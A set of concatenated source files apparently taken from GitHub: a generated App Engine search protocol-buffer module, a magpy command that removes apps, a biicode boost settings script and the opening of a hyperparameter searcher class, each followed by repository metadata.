def __init__(self, contents=None):
self.refinement_ = FacetRefinement()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def count(self): return self.count_
def set_count(self, x):
self.has_count_ = 1
self.count_ = x
def clear_count(self):
if self.has_count_:
self.has_count_ = 0
self.count_ = 0
def has_count(self): return self.has_count_
def refinement(self): return self.refinement_
def mutable_refinement(self): self.has_refinement_ = 1; return self.refinement_
def clear_refinement(self):self.has_refinement_ = 0; self.refinement_.Clear()
def has_refinement(self): return self.has_refinement_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_count()): self.set_count(x.count())
if (x.has_refinement()): self.mutable_refinement().MergeFrom(x.refinement())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_count_ != x.has_count_: return 0
if self.has_count_ and self.count_ != x.count_: return 0
if self.has_refinement_ != x.has_refinement_: return 0
if self.has_refinement_ and self.refinement_ != x.refinement_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_count_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: count not set.')
if (not self.has_refinement_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: refinement not set.')
elif not self.refinement_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthVarInt64(self.count_)
n += self.lengthString(self.refinement_.ByteSize())
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_count_):
n += 1
n += self.lengthVarInt64(self.count_)
if (self.has_refinement_):
n += 1
n += self.lengthString(self.refinement_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_count()
self.clear_refinement()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
out.putVarInt32(16)
out.putVarInt32(self.count_)
out.putVarInt32(26)
out.putVarInt32(self.refinement_.ByteSize())
self.refinement_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_count_):
out.putVarInt32(16)
out.putVarInt32(self.count_)
if (self.has_refinement_):
out.putVarInt32(26)
out.putVarInt32(self.refinement_.ByteSizePartial())
self.refinement_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 16:
self.set_count(d.getVarInt32())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_refinement().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
if self.has_refinement_:
res+=prefix+"refinement <\n"
res+=self.refinement_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kcount = 2
krefinement = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "count",
3: "refinement",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetResultValue'
class FacetResult(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
def __init__(self, contents=None):
self.value_ = []
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value_size(self): return len(self.value_)
def value_list(self): return self.value_
def value(self, i):
return self.value_[i]
def mutable_value(self, i):
return self.value_[i]
def add_value(self):
x = FacetResultValue()
self.value_.append(x)
return x
def clear_value(self):
self.value_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
for i in xrange(x.value_size()): self.add_value().CopyFrom(x.value(i))
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if len(self.value_) != len(x.value_): return 0
for e1, e2 in zip(self.value_, x.value_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
for p in self.value_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(self.value_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(self.value_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putVarInt32(self.value_[i].ByteSize())
self.value_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putVarInt32(self.value_[i].ByteSizePartial())
self.value_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_value().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
cnt=0
for e in self.value_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetResult'
class SearchResult(ProtocolBuffer.ProtocolMessage):
has_document_ = 0
has_cursor_ = 0
cursor_ = ""
def __init__(self, contents=None):
self.document_ = Document()
self.expression_ = []
self.score_ = []
if contents is not None: self.MergeFromString(contents)
def document(self): return self.document_
def mutable_document(self): self.has_document_ = 1; return self.document_
def clear_document(self):self.has_document_ = 0; self.document_.Clear()
def has_document(self): return self.has_document_
def expression_size(self): return len(self.expression_)
def expression_list(self): return self.expression_
def expression(self, i):
return self.expression_[i]
def mutable_expression(self, i):
return self.expression_[i]
def add_expression(self):
x = Field()
self.expression_.append(x)
return x
def clear_expression(self):
self.expression_ = []
def score_size(self): return len(self.score_)
def score_list(self): return self.score_
def score(self, i):
return self.score_[i]
def set_score(self, i, x):
self.score_[i] = x
def add_score(self, x):
self.score_.append(x)
def clear_score(self):
self.score_ = []
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def MergeFrom(self, x):
assert x is not self
if (x.has_document()): self.mutable_document().MergeFrom(x.document())
for i in xrange(x.expression_size()): self.add_expression().CopyFrom(x.expression(i))
for i in xrange(x.score_size()): self.add_score(x.score(i))
if (x.has_cursor()): self.set_cursor(x.cursor())
def Equals(self, x):
if x is self: return 1
if self.has_document_ != x.has_document_: return 0
if self.has_document_ and self.document_ != x.document_: return 0
if len(self.expression_) != len(x.expression_): return 0
for e1, e2 in zip(self.expression_, x.expression_):
if e1 != e2: return 0
if len(self.score_) != len(x.score_): return 0
for e1, e2 in zip(self.score_, x.score_):
if e1 != e2: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_document_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: document not set.')
elif not self.document_.IsInitialized(debug_strs): initialized = 0
for p in self.expression_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.document_.ByteSize())
n += 1 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.lengthString(self.expression_[i].ByteSize())
n += 9 * len(self.score_)
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_document_):
n += 1
n += self.lengthString(self.document_.ByteSizePartial())
n += 1 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.lengthString(self.expression_[i].ByteSizePartial())
n += 9 * len(self.score_)
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
return n
def Clear(self):
self.clear_document()
self.clear_expression()
self.clear_score()
self.clear_cursor()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.document_.ByteSize())
self.document_.OutputUnchecked(out)
for i in xrange(len(self.score_)):
out.putVarInt32(17)
out.putDouble(self.score_[i])
if (self.has_cursor_):
out.putVarInt32(26)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.expression_)):
out.putVarInt32(34)
out.putVarInt32(self.expression_[i].ByteSize())
self.expression_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_document_):
out.putVarInt32(10)
out.putVarInt32(self.document_.ByteSizePartial())
self.document_.OutputPartial(out)
for i in xrange(len(self.score_)):
out.putVarInt32(17)
out.putDouble(self.score_[i])
if (self.has_cursor_):
out.putVarInt32(26)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.expression_)):
out.putVarInt32(34)
out.putVarInt32(self.expression_[i].ByteSizePartial())
self.expression_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_document().TryMerge(tmp)
continue
if tt == 17:
self.add_score(d.getDouble())
continue
if tt == 26:
self.set_cursor(d.getPrefixedString())
continue
if tt == 34:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_expression().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_document_:
res+=prefix+"document <\n"
res+=self.document_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.expression_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("expression%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.score_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("score%s: %s\n" % (elm, self.DebugFormat(e)))
cnt+=1
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdocument = 1
kexpression = 4
kscore = 2
kcursor = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "document",
2: "score",
3: "cursor",
4: "expression",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.DOUBLE,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchResult'
class SearchResponse(_ExtendableProtocolMessage):
has_matched_count_ = 0
matched_count_ = 0
has_status_ = 0
has_cursor_ = 0
cursor_ = ""
def __init__(self, contents=None):
if _extension_runtime:
self._extension_fields = {}
self.result_ = []
self.status_ = RequestStatus()
self.facet_result_ = []
if contents is not None: self.MergeFromString(contents)
def result_size(self): return len(self.result_)
def result_list(self): return self.result_
def result(self, i):
return self.result_[i]
def mutable_result(self, i):
return self.result_[i]
def add_result(self):
x = SearchResult()
self.result_.append(x)
return x
def clear_result(self):
self.result_ = []
def matched_count(self): return self.matched_count_
def set_matched_count(self, x):
self.has_matched_count_ = 1
self.matched_count_ = x
def clear_matched_count(self):
if self.has_matched_count_:
self.has_matched_count_ = 0
self.matched_count_ = 0
def has_matched_count(self): return self.has_matched_count_
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def facet_result_size(self): return len(self.facet_result_)
def facet_result_list(self): return self.facet_result_
def facet_result(self, i):
return self.facet_result_[i]
def mutable_facet_result(self, i):
return self.facet_result_[i]
def add_facet_result(self):
x = FacetResult()
self.facet_result_.append(x)
return x
def clear_facet_result(self):
self.facet_result_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.result_size()): self.add_result().CopyFrom(x.result(i))
if (x.has_matched_count()): self.set_matched_count(x.matched_count())
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
if (x.has_cursor()): self.set_cursor(x.cursor())
for i in xrange(x.facet_result_size()): self.add_facet_result().CopyFrom(x.facet_result(i))
if _extension_runtime: self._MergeExtensionFields(x)
def Equals(self, x):
if x is self: return 1
if len(self.result_) != len(x.result_): return 0
for e1, e2 in zip(self.result_, x.result_):
if e1 != e2: return 0
if self.has_matched_count_ != x.has_matched_count_: return 0
if self.has_matched_count_ and self.matched_count_ != x.matched_count_: return 0
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
if len(self.facet_result_) != len(x.facet_result_): return 0
for e1, e2 in zip(self.facet_result_, x.facet_result_):
if e1 != e2: return 0
if _extension_runtime and not self._ExtensionEquals(x): return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.result_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_matched_count_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: matched_count not set.')
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.facet_result_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.result_)
for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSize())
n += self.lengthVarInt64(self.matched_count_)
n += self.lengthString(self.status_.ByteSize())
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
n += 1 * len(self.facet_result_)
for i in xrange(len(self.facet_result_)): n += self.lengthString(self.facet_result_[i].ByteSize())
if _extension_runtime:
n += self._ExtensionByteSize(False)
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.result_)
for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSizePartial())
if (self.has_matched_count_):
n += 1
n += self.lengthVarInt64(self.matched_count_)
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
n += 1 * len(self.facet_result_)
for i in xrange(len(self.facet_result_)): n += self.lengthString(self.facet_result_[i].ByteSizePartial())
if _extension_runtime:
n += self._ExtensionByteSize(True)
return n
def Clear(self):
self.clear_result()
self.clear_matched_count()
self.clear_status()
self.clear_cursor()
self.clear_facet_result()
if _extension_runtime: self._extension_fields.clear()
def OutputUnchecked(self, out):
if _extension_runtime:
extensions = self._ListExtensions()
extension_index = 0
for i in xrange(len(self.result_)):
out.putVarInt32(10)
out.putVarInt32(self.result_[i].ByteSize())
self.result_[i].OutputUnchecked(out)
out.putVarInt32(16)
out.putVarInt64(self.matched_count_)
out.putVarInt32(26)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.facet_result_)):
out.putVarInt32(42)
out.putVarInt32(self.facet_result_[i].ByteSize())
self.facet_result_[i].OutputUnchecked(out)
if _extension_runtime:
extension_index = self._OutputExtensionFields(out, False, extensions, extension_index, 10000)
def OutputPartial(self, out):
if _extension_runtime:
extensions = self._ListExtensions()
extension_index = 0
for i in xrange(len(self.result_)):
out.putVarInt32(10)
out.putVarInt32(self.result_[i].ByteSizePartial())
self.result_[i].OutputPartial(out)
if (self.has_matched_count_):
out.putVarInt32(16)
out.putVarInt64(self.matched_count_)
if (self.has_status_):
out.putVarInt32(26)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.facet_result_)):
out.putVarInt32(42)
out.putVarInt32(self.facet_result_[i].ByteSizePartial())
self.facet_result_[i].OutputPartial(out)
if _extension_runtime:
extension_index = self._OutputExtensionFields(out, True, extensions, extension_index, 10000)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_result().TryMerge(tmp)
continue
if tt == 16:
self.set_matched_count(d.getVarInt64())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 34:
self.set_cursor(d.getPrefixedString())
continue
if tt == 42:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_facet_result().TryMerge(tmp)
continue
if _extension_runtime:
if (1000 <= tt and tt < 10000):
self._ParseOneExtensionField(tt, d)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.result_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("result%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_matched_count_: res+=prefix+("matched_count: %s\n" % self.DebugFormatInt64(self.matched_count_))
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
cnt=0
for e in self.facet_result_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("facet_result%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if _extension_runtime:
res+=self._ExtensionDebugString(prefix, printElemNumber)
return res
if _extension_runtime:
_extensions_by_field_number = {}
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kresult = 1
kmatched_count = 2
kstatus = 3
kcursor = 4
kfacet_result = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "result",
2: "matched_count",
3: "status",
4: "cursor",
5: "facet_result",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.STRING,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchResponse'
if _extension_runtime:
pass
__all__ = ['SearchServiceError','RequestStatus','IndexSpec','IndexMetadata_Storage','IndexMetadata','IndexDocumentParams','IndexDocumentRequest','IndexDocumentResponse','DeleteDocumentParams','DeleteDocumentRequest','DeleteDocumentResponse','ListDocumentsParams','ListDocumentsRequest','ListDocumentsResponse','DeleteIndexParams','DeleteIndexRequest','DeleteIndexResponse','CancelDeleteIndexParams','CancelDeleteIndexRequest','CancelDeleteIndexResponse','ListIndexesParams','ListIndexesRequest','ListIndexesResponse','DeleteSchemaParams','DeleteSchemaRequest','DeleteSchemaResponse','SortSpec','ScorerSpec','FieldSpec','FieldSpec_Expression','FacetRange','FacetRequestParam','FacetAutoDetectParam','FacetRequest','FacetRefinement_Range','FacetRefinement','SearchParams','SearchRequest','FacetResultValue','FacetResult','SearchResult','SearchResponse']
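# --- Usage sketch (illustration only; not part of the generated module) ---
# A minimal, hedged example of driving these generated messages. The accessor
# names follow the set_/mutable_ pattern visible in the classes above;
# IndexSpec.set_name() and SearchParams.set_query() are assumed from that same
# pattern, and Encode() comes from the ProtocolBuffer base class.
#
#   request = SearchRequest()
#   params = request.mutable_params()
#   params.mutable_index_spec().set_name('products')
#   params.set_query('price<100')
#   payload = request.Encode()            # serialize to wire format
#   round_trip = SearchRequest(payload)   # decodes via MergeFromString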
|
{
"content_hash": "08f276f64f5d4f9e868f6c7d924ee582",
"timestamp": "",
"source": "github",
"line_count": 7525,
"max_line_length": 851,
"avg_line_length": 29.643322259136212,
"alnum_prop": 0.6357669927286095,
"repo_name": "ProfessionalIT/maxigenios-website",
"id": "a3750576a17fce01de62f7c7b67ba60bfc06ed95",
"size": "223670",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sdk/google_appengine/google/appengine/api/search/search_service_pb.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "423"
},
{
"name": "Batchfile",
"bytes": "5005"
},
{
"name": "C",
"bytes": "407880"
},
{
"name": "CSS",
"bytes": "334712"
},
{
"name": "Emacs Lisp",
"bytes": "4733"
},
{
"name": "HTML",
"bytes": "623959"
},
{
"name": "JavaScript",
"bytes": "880776"
},
{
"name": "Makefile",
"bytes": "14029"
},
{
"name": "PHP",
"bytes": "2886167"
},
{
"name": "Python",
"bytes": "40653515"
},
{
"name": "Shell",
"bytes": "3855"
},
{
"name": "TeX",
"bytes": "3149"
},
{
"name": "VimL",
"bytes": "5645"
}
],
"symlink_target": ""
}
|
"""Remove an app_name(s) from installed apps."""
from magpy.management import BaseCommand, CommandError
from magpy.server.database import Database
class Command(BaseCommand):
"""Remove an app_name(s) from installed apps."""
help = ('Remove an app_name(s) from installed apps.')
args = '[app_name ...]'
def handle(self, *args, **kwargs):
database = Database()
for arg in args:
database.remove_app(arg)
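# --- Usage sketch (illustration only; not part of the original command) ---
# 'blog' and 'shop' are placeholder app names; invoking this for real would
# remove them from the installed-apps collection via Database.remove_app().
#
#   Command().handle('blog', 'shop')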
|
{
"content_hash": "e3b83d1490011b5e53172649860a844f",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 57,
"avg_line_length": 32,
"alnum_prop": 0.6540178571428571,
"repo_name": "zeth/magpy",
"id": "ab95053c8a324db838e6ea509a933b7917b1fcde",
"size": "448",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "magpy/management/commands/remove_app.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "173315"
},
{
"name": "Python",
"bytes": "295428"
}
],
"symlink_target": ""
}
|
import os
import urllib
import json
import sys
import ast
import argparse
import utils
def settings(default_parser):
parser = default_parser
args = default_parser.parse_args()
boost_version = args.track if args.track != "master" else "1.57.0"
passwords = ast.literal_eval(args.passwords.replace('->', ':'))
variables = {"BIICODE_BOOST_VERSION":
lambda block, block_track, file: boost_version,
"WORKING_TRACK":
lambda block, block_track, file: args.track,
"BIICODE_BOOST_BLOCK":
lambda block, block_track, file: "biicode/boost({0})"
.format(block_track),
"LATEST_BLOCK_VERSION":
lambda block, block_track, file: utils.latest_block_version(block, block_track)}
templates={"biicode/boost":
{"publish": not args.no_publish,
"tag": args.tag,
"files":
{"biicode.conf": ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION"],
"setup.cmake": ["BIICODE_BOOST_VERSION"]}
}
}
# "examples/boost-log" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-coroutine" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-filesystem" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-flyweight" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-multiindex" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-phoenix" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-signals" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])])}
#Boost.Log takes so much time to compile, leads to timeouts on Travis CI
#It was tested on Windows and linux, works 'ok' (Be careful with linking settings)
if args.ci and 'examples/boost-log' in templates: del templates['examples/boost-log']
if args.exclude:
for block in args.exclude.split(' '):
if block in templates:
del templates[block]
return utils.GenerationSettings(templates, variables, passwords,
args.templates_path, args.blocks_path)
if __name__ == '__main__':
print(settings())
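# --- Usage sketch (illustration only; not part of the original script) ---
# A minimal way to build a parser that settings() can consume. The flag names
# are inferred from the attributes read above (track, passwords, no_publish,
# tag, ci, exclude, templates_path, blocks_path); defaults are placeholders.
def _settings_usage_sketch():
    parser = argparse.ArgumentParser()
    parser.add_argument('--track', default='master')
    parser.add_argument('--passwords', default='{}')
    parser.add_argument('--no_publish', action='store_true')
    parser.add_argument('--tag', default=None)
    parser.add_argument('--ci', action='store_true')
    parser.add_argument('--exclude', default=None)
    parser.add_argument('--templates_path', default='templates')
    parser.add_argument('--blocks_path', default='blocks')
    # settings() calls parse_args() itself, so only the parser is passed in.
    return settings(parser)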
|
{
"content_hash": "e02e8f906a4da7839cd7260af95c334a",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 157,
"avg_line_length": 49.152542372881356,
"alnum_prop": 0.5779310344827586,
"repo_name": "bowlofstew/boost",
"id": "fe9deb935cb6f08956a1e490b8b849c8be587603",
"size": "2969",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "22473"
},
{
"name": "CMake",
"bytes": "38314"
},
{
"name": "Python",
"bytes": "2969"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
}
|
import deep_architect.searchers.common as se
import numpy as np
# NOTE: this searcher does not do any budget adjustment and needs to be
# combined with an evaluator that does.
class SuccessiveNarrowing(se.Searcher):
def __init__(self, search_space_fn, num_initial_samples, reduction_factor,
reset_default_scope_upon_sample):
se.Searcher.__init__(self, search_space_fn,
reset_default_scope_upon_sample)
self.num_initial_samples = num_initial_samples
self.reduction_factor = reduction_factor
self.vals = [None for _ in range(num_initial_samples)]
self.num_remaining = num_initial_samples
self.idx = 0
self.queue = []
for _ in range(num_initial_samples):
inputs, outputs = search_space_fn()
hyperp_value_lst = se.random_specify(outputs)
self.queue.append(hyperp_value_lst)
def sample(self):
assert self.idx < len(self.queue)
hyperp_value_lst = self.queue[self.idx]
(inputs, outputs) = self.search_space_fn()
se.specify(outputs, hyperp_value_lst)
idx = self.idx
self.idx += 1
return inputs, outputs, hyperp_value_lst, {"idx": idx}
def update(self, val, searcher_eval_token):
